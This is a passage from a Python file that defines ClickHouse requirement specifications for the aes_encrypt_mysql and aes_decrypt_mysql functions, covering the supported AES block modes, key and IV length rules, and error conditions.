                '[OpenSSL] implementation.\n')
# Supported `mode` values for `aes_encrypt_mysql`: every combination of the
# six MySQL-compatible block modes with the three AES key sizes.  The
# eighteen requirements share one template, so they are generated in a loop.
# Defines module-level names of the form
#   RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_<bits>_<MODE>
for _mode in ('ECB', 'CBC', 'CFB1', 'CFB8', 'CFB128', 'OFB'):
    for _bits in (128, 192, 256):
        globals()['RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_%d_%s' % (_bits, _mode)] = Requirement(
            name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-%d-%s' % (_bits, _mode),
            version='1.0',
            priority=None,
            group=None,
            type=None,
            uid=None,
            description=(
                '[ClickHouse] SHALL support `aes-%d-%s` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n' % (_bits, _mode.lower())
                + 'and [AES] algorithm SHALL use the [%s] block mode encryption with a %d bit key.\n' % (_mode, _bits)
            ),
            link=None
        )
del _mode, _bits
# GCM and CTR are not MySQL-compatible modes: selecting them in
# `aes_encrypt_mysql` is an error for every key size.  Generated in a loop;
# defines module-level names of the form
#   RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_<bits>_<MODE>_Error
for _mode in ('GCM', 'CTR'):
    for _bits in (128, 192, 256):
        globals()['RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_%d_%s_Error' % (_bits, _mode)] = Requirement(
            name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-%d-%s.Error' % (_bits, _mode),
            version='1.0',
            priority=None,
            group=None,
            type=None,
            uid=None,
            description=(
                '[ClickHouse] SHALL return an error if `aes-%d-%s` is specified as the value for the `mode` parameter of the\n' % (_bits, _mode.lower())
                + '`aes_encrypt_mysql` function.\n'
            ),
            link=None
        )
del _mode, _bits
# `aes_encrypt_mysql`: optional `iv` parameter, return value, and how
# over/under-sized keys and ivs are handled (too short -> error; too-long
# key -> folded; too-long iv -> truncated to the first N bytes).
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_InitializationVector = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.InitializationVector',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support `iv` with `String` or `FixedString` data types as the optional fourth\n'
                'parameter to the `aes_encrypt_mysql` function that SHALL specify the initialization vector for block modes that require\n'
                'it.\n')
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_ReturnValue = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.ReturnValue',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL return the encrypted value of the data\n'
                'using `String` data type as the result of `aes_encrypt_mysql` function.\n')
RQ_SRS008_AES_MySQL_Encrypt_Function_Key_Length_TooShortError = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.Key.Length.TooShortError',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL return an error if the `key` length is less than the minimum for the `aes_encrypt_mysql`\n'
                'function for a given block mode.\n')
# NOTE(review): the fold_key example below contains a leftover debug
# `print(i % cipher_key_size, i)` line.  It is reproduced verbatim because
# the description text is requirement data; confirm and fix it upstream in
# the SRS document this file is generated from.
RQ_SRS008_AES_MySQL_Encrypt_Function_Key_Length_TooLong = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.Key.Length.TooLong',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL use folding algorithm specified below if the `key` length is longer than required\n'
                'for the `aes_encrypt_mysql` function for a given block mode.\n'
                '\n'
                '```python\n'
                'def fold_key(key, cipher_key_size):\n'
                ' key = list(key) if not isinstance(key, (list, tuple)) else key\n'
                '\t folded_key = key[:cipher_key_size]\n'
                '\t for i in range(cipher_key_size, len(key)):\n'
                '\t\t print(i % cipher_key_size, i)\n'
                '\t\t folded_key[i % cipher_key_size] ^= key[i]\n'
                '\t return folded_key\n'
                '```\n')
RQ_SRS008_AES_MySQL_Encrypt_Function_InitializationVector_Length_TooShortError = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.InitializationVector.Length.TooShortError',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL return an error if the `iv` length is specified and is less than the minimum\n'
                'that is required for the `aes_encrypt_mysql` function for a given block mode.\n')
RQ_SRS008_AES_MySQL_Encrypt_Function_InitializationVector_Length_TooLong = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.InitializationVector.Length.TooLong',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL use the first `N` bytes that are required if the `iv` is specified and\n'
                'its length is longer than required for the `aes_encrypt_mysql` function for a given block mode.\n')
RQ_SRS008_AES_MySQL_Encrypt_Function_InitializationVector_NotValidForMode = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.InitializationVector.NotValidForMode',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL return an error if the `iv` is specified for the `aes_encrypt_mysql`\n'
                'function for a mode that does not need it.\n')
# `aes_encrypt_mysql`: key/iv length requirements for the ECB, CBC and CFB1
# modes.  Key length follows the AES bit size (bits // 8); ECB forbids an iv
# outright while CBC/CFB1 require at least 16 bytes when one is given.
# Defines module-level names of the form
#   RQ_SRS008_AES_MySQL_Encrypt_Function_AES_<bits>_<MODE>_KeyAndInitializationVector_Length
_IV_CLAUSE = {
    'ECB': 'or `iv` is specified.\n',
    'CBC': 'or if specified `iv` is less than 16 bytes.\n',
    'CFB1': 'or if specified `iv` is less than 16 bytes.\n',
}
for _mode in ('ECB', 'CBC', 'CFB1'):
    for _bits in (128, 192, 256):
        globals()['RQ_SRS008_AES_MySQL_Encrypt_Function_AES_%d_%s_KeyAndInitializationVector_Length' % (_bits, _mode)] = Requirement(
            name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-%d-%s.KeyAndInitializationVector.Length' % (_bits, _mode),
            version='1.0',
            priority=None,
            group=None,
            type=None,
            uid=None,
            description=(
                '[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-%d-%s` and `key` is less than %d bytes\n' % (_bits, _mode.lower(), _bits // 8)
                + _IV_CLAUSE[_mode]
            ),
            link=None
        )
del _IV_CLAUSE, _mode, _bits
# Key/iv length requirement for `aes_encrypt_mysql` with `aes-128-cfb8`.
# Fix: the description said "and if specified `iv` ..." while every sibling
# requirement (aes-192-cfb8, aes-256-cfb8, and all CBC/CFB/OFB variants) says
# "or if specified `iv` ..."; corrected for consistency.  NOTE(review): this
# file is generated from an SRS document -- apply the same fix upstream.
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_128_CFB8_KeyAndInitializationVector_Length = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-128-CFB8.KeyAndInitializationVector.Length',
    version='1.0',
    priority=None,
    group=None,
    type=None,
    uid=None,
    description=(
        '[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-128-cfb8` and `key` is less than 16 bytes\n'
        'or if specified `iv` is less than 16 bytes.\n'
    ),
    link=None
)
# `aes_encrypt_mysql`: remaining key/iv length requirements (CFB8 for the
# 192/256 key sizes -- 128 is defined separately just above -- plus all
# CFB128 and OFB sizes).  Every entry shares the same iv clause; the key
# length follows the AES bit size (bits // 8).  Defines module-level names
# of the form
#   RQ_SRS008_AES_MySQL_Encrypt_Function_AES_<bits>_<MODE>_KeyAndInitializationVector_Length
for _bits, _mode in [
        (192, 'CFB8'), (256, 'CFB8'),
        (128, 'CFB128'), (192, 'CFB128'), (256, 'CFB128'),
        (128, 'OFB'), (192, 'OFB'), (256, 'OFB')]:
    globals()['RQ_SRS008_AES_MySQL_Encrypt_Function_AES_%d_%s_KeyAndInitializationVector_Length' % (_bits, _mode)] = Requirement(
        name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-%d-%s.KeyAndInitializationVector.Length' % (_bits, _mode),
        version='1.0',
        priority=None,
        group=None,
        type=None,
        uid=None,
        description=(
            '[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-%d-%s` and `key` is less than %d bytes\n' % (_bits, _mode.lower(), _bits // 8)
            + 'or if specified `iv` is less than 16 bytes.\n'
        ),
        link=None
    )
del _bits, _mode
# `aes_decrypt_mysql`: base requirement, call syntax, and the first three
# parameters (ciphertext, key, mode) -- mirrors the aes_encrypt_mysql group.
RQ_SRS008_AES_MySQL_Decrypt_Function = Requirement(
    name='RQ.SRS008.AES.MySQL.Decrypt.Function',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support `aes_decrypt_mysql` function to decrypt data using [AES].\n')
# Accepted call shape of the function.
RQ_SRS008_AES_MySQL_Decrypt_Function_Syntax = Requirement(
    name='RQ.SRS008.AES.MySQL.Decrypt.Function.Syntax',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support the following syntax for the `aes_decrypt_mysql` function\n'
                '\n'
                '```sql\n'
                'aes_decrypt_mysql(ciphertext, key, mode, [iv])\n'
                '```\n')
# First positional parameter: the data to decrypt.
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_CipherText = Requirement(
    name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.CipherText',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support `ciphertext` accepting any data type as\n'
                'the first parameter to the `aes_decrypt_mysql` function that SHALL specify the data to be decrypted.\n')
# Second positional parameter: the encryption key.
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Key = Requirement(
    name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Key',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support `key` with `String` or `FixedString` data types\n'
                'as the second parameter to the `aes_decrypt_mysql` function that SHALL specify the encryption key.\n')
# Third positional parameter: key length + block mode selector.
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode = Requirement(
    name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support `mode` with `String` or `FixedString` data types as the third parameter\n'
                'to the `aes_decrypt_mysql` function that SHALL specify encryption key length and block encryption mode.\n')
# Format of accepted `mode` values for `aes_decrypt_mysql`.
# Fix: the description read "SHALL specifies" -- corrected to the grammatical
# "SHALL specify".  NOTE(review): this file is generated from an SRS document;
# the same fix should be applied upstream so regeneration does not revert it.
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_ValuesFormat = Requirement(
    name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.ValuesFormat',
    version='1.0',
    priority=None,
    group=None,
    type=None,
    uid=None,
    description=(
        '[ClickHouse] SHALL support values of the form `aes-[key length]-[mode]` for the `mode` parameter\n'
        'of the `aes_decrypt_mysql` function where\n'
        'the `key_length` SHALL specify the length of the key and SHALL accept\n'
        '`128`, `192`, or `256` as the values and the `mode` SHALL specify the block encryption\n'
        'mode and SHALL accept [ECB], [CBC], [CFB1], [CFB8], [CFB128], or [OFB]. For example, `aes-256-ofb`.\n'
    ),
    link=None
)
# Invalid `mode` values for `aes_decrypt_mysql` must be rejected, except when
# the underlying OpenSSL build happens to support such a mode.
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_Invalid = Requirement(
    name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.Invalid',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL return an error if the specified value for the `mode` parameter of the `aes_decrypt_mysql`\n'
                'function is not valid with the exception where such a mode is supported by the underlying\n'
                '[OpenSSL] implementation.\n')
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_ECB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ecb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_ECB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ecb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_ECB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ecb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_CBC = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cbc` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_CBC = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cbc` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_CBC = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cbc` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB1 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb1` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB1 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb1` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB1 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb1` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB8 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb8` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB8 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb8` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB8 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb8` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB128 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb128` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB128 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb128` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB128 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb128` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_OFB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ofb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_OFB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ofb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_OFB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ofb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_GCM_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-GCM.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-128-gcm` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_GCM_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-GCM.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-192-gcm` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_GCM_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-GCM.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-256-gcm` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_CTR_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-CTR.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-128-ctr` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_CTR_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-CTR.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-192-ctr` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_CTR_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-CTR.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-256-ctr` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_InitializationVector = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.InitializationVector',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `iv` with `String` or `FixedString` data types as the optional fourth\n'
'parameter to the `aes_decrypt_mysql` function that SHALL specify the initialization vector for block modes that require\n'
'it.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_ReturnValue = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.ReturnValue',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return the decrypted value of the data\n'
'using `String` data type as the result of `aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Key_Length_TooShortError = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Key.Length.TooShortError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `key` length is less than the minimum for the `aes_decrypt_mysql`\n'
'function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Key_Length_TooLong = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Key.Length.TooLong',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL use folding algorithm specified below if the `key` length is longer than required\n'
'for the `aes_decrypt_mysql` function for a given block mode.\n'
'\n'
'```python\n'
'def fold_key(key, cipher_key_size):\n'
' key = list(key) if not isinstance(key, (list, tuple)) else key\n'
'\t folded_key = key[:cipher_key_size]\n'
'\t for i in range(cipher_key_size, len(key)):\n'
'\t\t print(i % cipher_key_size, i)\n'
'\t\t folded_key[i % cipher_key_size] ^= key[i]\n'
'\t return folded_key\n'
'```\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_InitializationVector_Length_TooShortError = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.InitializationVector.Length.TooShortError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` length is specified and is less than the minimum\n'
'that is required for the `aes_decrypt_mysql` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_InitializationVector_Length_TooLong = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.InitializationVector.Length.TooLong',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL use the first `N` bytes that are required if the `iv` is specified and\n'
'its length is longer than required for the `aes_decrypt_mysql` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_InitializationVector_NotValidForMode = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.InitializationVector.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` is specified for the `aes_decrypt_mysql`\n'
'function for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-ecb` and `key` is less than 16 bytes\n'
'or `iv` is specified.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-ecb` and `key` is less than 24 bytes\n'
'or `iv` is specified.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-ecb` and `key` is less than 32 bytes\n'
'or `iv` is specified.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-cbc` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-cbc` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-cbc` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-cfb1` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
